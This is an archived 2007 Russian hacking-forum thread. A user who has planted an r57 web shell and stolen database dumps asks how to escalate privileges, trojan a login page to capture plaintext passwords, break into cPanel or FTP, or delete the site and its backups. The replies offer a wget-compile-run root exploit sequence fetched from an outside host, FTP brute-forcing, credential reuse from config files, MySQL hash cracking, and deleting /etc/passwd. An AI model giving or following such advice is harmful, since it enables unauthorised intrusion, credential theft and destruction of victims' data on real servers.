ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

13.09.2007, 15:16
|
|
Новичок
Регистрация: 07.09.2007
Сообщений: 5
Провел на форуме: 4301
Репутация:
-5
|
|
Залит шелл, как дальше?
Всем привет.
Дано: залит классический r57, стянуты дампы баз данных, частично расшифрованы.
Пароли админов похоже слишком сложные, неделя расшифровки результатов не дала.
Посоветуйте, что можно сделать дальше... хотел протроянить login.php форума или сайта, что бы он пароли высылал нешифрованые но шелу не хватает прав.
В общем вопрос такой, как повысить шелл в правах
либо как при этих условиях взломать cpanel (только не брутфорс, скорее всего не поможет)
либо как тупо удалить всё из public_html и каталога выше (полюбому там бэкапы баз есть)
Скриптик то у меня для удаления конечно есть, но как ему дать достаточно прав для меня тоже вопрос.
И ещё, может быть есть способы открыть фтп?
|
|
|

13.09.2007, 16:38
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме: 492591
Репутация:
123
|
|
Во-первых, в r57 есть функция фтп брута, во-вторых, повысить права скрипта можно двумя способами - либо покопаться в конфигах серва и найти пароли, либо сплойтом, как использовать эксплойт и байнд скрипты, а также бэкконнеты смотри на форуме
|
|
|

13.09.2007, 16:58
|
|
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме: 1392441
Репутация:
161
|
|
командную строку вызвать могёшь?
|
|
|

13.09.2007, 19:37
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме: 967842
Репутация:
251
|
|
uname -a
http://my_lybimii_bug_track.com/sploit/
wget http://my_lybimii_bug_track.com/sploit/1.c
gcc 1.c -o haked
./haked
id
(0)root!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
|
|
|

13.09.2007, 23:41
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме: 5128756
Репутация:
2032
|
|
Сообщение от fly
А я бы сразу удалил /etc/shadow!!!
прав не хватит. и заливка тогда коту под хвост...
так что лучше удаляй /etc/passwd
|
|
|

13.09.2007, 23:52
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме: 967842
Репутация:
251
|
|
Да знаю!!Да бы не разводить флейм, надо root или права на Public_html!Кста, а /etc/passwd можно удалить без прав рута, ну ты дал!
|
|
|

14.09.2007, 02:09
|
|
Новичок
Регистрация: 07.09.2007
Сообщений: 5
Провел на форуме: 4301
Репутация:
-5
|
|
повысить права скрипта можно двумя способами - либо покопаться в конфигах серва и найти пароли, либо сплойтом, как использовать эксплойт и байнд скрипты, а также бэкконнеты смотри на форуме
первое не походит по тому что конфиги то недоступны, этот сайт один из многих у хочтера. Хостер довольно крупный и мне уж точно сейчас не по зубам.
По части второго, спасибо пищу, почитаю...
командную строку вызвать могёшь?
cmd?  Нет, на сервере не могу.
uname -a
http://my_lybimii_bug_track.com/sploit/
wget http://my_lybimii_bug_track.com/sploit/1.c
gcc 1.c -o haked
./haked
id
(0)root!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1.c - какой споилт, будет ли он там компилироваться?
gcc 1.c -o haked
./haked
id
^^^что это означает? Извините по никсу слаб, просто появилась задача, стараюсь её реализовать.
рекурсивное удаление (т.е. удаление, включая подкаталоги и скрытые файлы).
Так можна удалить файлы даже если их владелец являеться root, или если даже нету прав на их чтение. Только будь осторожен, я бы не советовал прямо удалять все файлы из папки public_html.
Не хватит прав
|
|
|

14.09.2007, 03:32
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
почитай конфиги сайта, если это не хомяк, то скорее всего есть скрипты для работы с бд ищи в них название конфигурационного файла (config.php,config.inc,config.inc.php,dbconf.php и т.д.) читай этот файл от бд там пароль и логин в чистом виде... пробуй их на другие сервисы на фтп или ssh могут прокатить...
если у тебя будет доступ к базе mysql (хотя врядли если это крутой хостер) то узнавай хеши паролей юзеров бд и бруть их, а потом также пробуй их к ssh и фтп...
__________________
Карфаген должен быть разрушен...
|
|
|

14.09.2007, 05:13
|
|
Новичок
Регистрация: 07.09.2007
Сообщений: 5
Провел на форуме: 4301
Репутация:
-5
|
|
я говорил же.. хэши (и дампы баз) стянул. Пароли админов не расшифровываются.
пароли от конфигов тоже никуда кроме как к базам не подходят.
|
|
|

14.09.2007, 05:28
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
Сообщение от totoro
я говорил же.. хэши (и дампы баз) стянул. Пароли админов не расшифровываются.
пароли от конфигов тоже никуда кроме как к базам не подходят.
мдя... причем тут админы я тебе про базу mysql говорил табличка там есть такая user так вот там хеши зашифрованные алгоритмами mysql или mysql5 (cоответственно 16 и 40 знаков) а если ниче не помогает, то тока рутать (ну или фтп брутить с помощью brutus aet например) тыб сначала написал какая там ось ядро и т.д.
в шелле выполни комманду uname -a и результаты в студию
__________________
Карфаген должен быть разрушен...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|